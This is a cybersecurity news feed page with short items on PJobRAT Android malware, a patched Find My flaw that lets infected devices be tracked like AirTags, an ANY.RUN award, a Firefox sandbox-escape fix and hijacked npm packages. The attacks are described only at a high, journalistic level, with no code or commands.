An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps.
“PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices,” Sophos security researcher Pankaj Kohli said in a Thursday analysis.
PJobRAT, first
The Hacker News – Read More
AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.
But a recent study by security researchers has surprisingly found that remote tracking doesn’t even depend on buying an AirTag or ever being physically near the target. If you manage to sneak special malware onto someone’s Windows, Android, or Linux device (like a computer or phone), it could use the device’s Bluetooth to send out a signal that nearby Apple devices would think is coming from an AirTag. Essentially, for Apple devices, the infected phone or computer effectively becomes an oversized AirTag – trackable via the Find My network, which boasts over a billion Apple phones and tablets.
The attack exploits two features of the Find My technology.
Firstly, this network uses end-to-end encryption – so participants don’t know whose signals they’re relaying. To exchange information, an AirTag and its owner’s phone rely on a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply transmit AirTag’s geolocation data to Apple servers. The data is encrypted with the lost AirTag’s public key.
Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.
Another feature of Find My is that detectors don’t verify whether the location signal indeed originated with an Apple device. Any devices that support Bluetooth Low Energy (BLE) can broadcast it.
To exploit these features, the researchers came up with the following method:
The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.
Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details are slightly different depending on the platform. On Linux devices, the attack only requires infecting the victim’s gadget due to the specific Bluetooth implementation. By contrast, Android and Windows employ Bluetooth address randomization, meaning the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to obtain its adapter address.
The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.
Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.
Another key part of the attack involves calculating cryptographic keys on the server. Due to the complexity of this operation – which requires leasing hardware with modern video cards – the cost of generating a key for a single victim is estimated at around $2.2. For this reason, we find mass-tracking scenarios that target, say, visitors inside a shopping center, to be unlikely. However, targeted attacks at this price point are accessible to virtually anyone, including scammers or nosy co-workers and spouses.
The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.
Besides this rather unusual and as-yet-unseen-in-the-wild tracking method, there are numerous other ways your location and activities can be tracked. What methods are being used to spy on you? Read these for the details:
Kaspersky official blog – Read More
The Globee Awards is an annual competition celebrating companies in various fields, including technology-related businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category.
It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals.
A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.
Among the advantages of our product that especially benefit businesses are highlighted:
We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee.
San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats:
We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
Integrate ANY.RUN’s services in your organization to strengthen your security →
The post ANY.RUN Wins Globee Awards 2025 for Outstanding Threat Detection and Response appeared first on ANY.RUN’s Cybersecurity Blog.
ANY.RUN’s Cybersecurity Blog – Read More
Mozilla has released updates to address a critical security flaw impacting its Firefox browser for Windows, merely days after Google patched a similar flaw in Chrome that came under active exploitation as a zero-day.
The security vulnerability, CVE-2025-2857, has been described as a case of an incorrect handle that could lead to a sandbox escape.
“Following the recent Chrome sandbox escape (
The Hacker News – Read More
Cybersecurity researchers have discovered several cryptocurrency packages on the npm registry that have been hijacked to siphon sensitive information such as environment variables from compromised systems.
“Some of these packages have lived on npmjs.com for over 9 years, and provide legitimate functionality to blockchain developers,” Sonatype researcher Ax Sharma said. “However, […] the latest
The Hacker News – Read More
The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.
darkreading – Read More
Disney’s latest Snow White movie, with a 1.6/10 IMDb rating, isn’t just the biggest flop the company has…
Hackread – Latest Cybersecurity, Tech, AI, Crypto & Hacking News – Read More
WIRED has found four new Venmo accounts that appear to be associated with Trump officials who were in an infamous Signal chat. One made a payment with a note consisting solely of an eggplant emoji.
Security Latest – Read More
The artificial intelligence research company previously had its maximum payout set at $20,000 before exponentially raising the reward.
darkreading – Read More
State and federal security experts weighed in on the impact that budgetary and personnel cuts to CISA will have on election security as a whole.
darkreading – Read More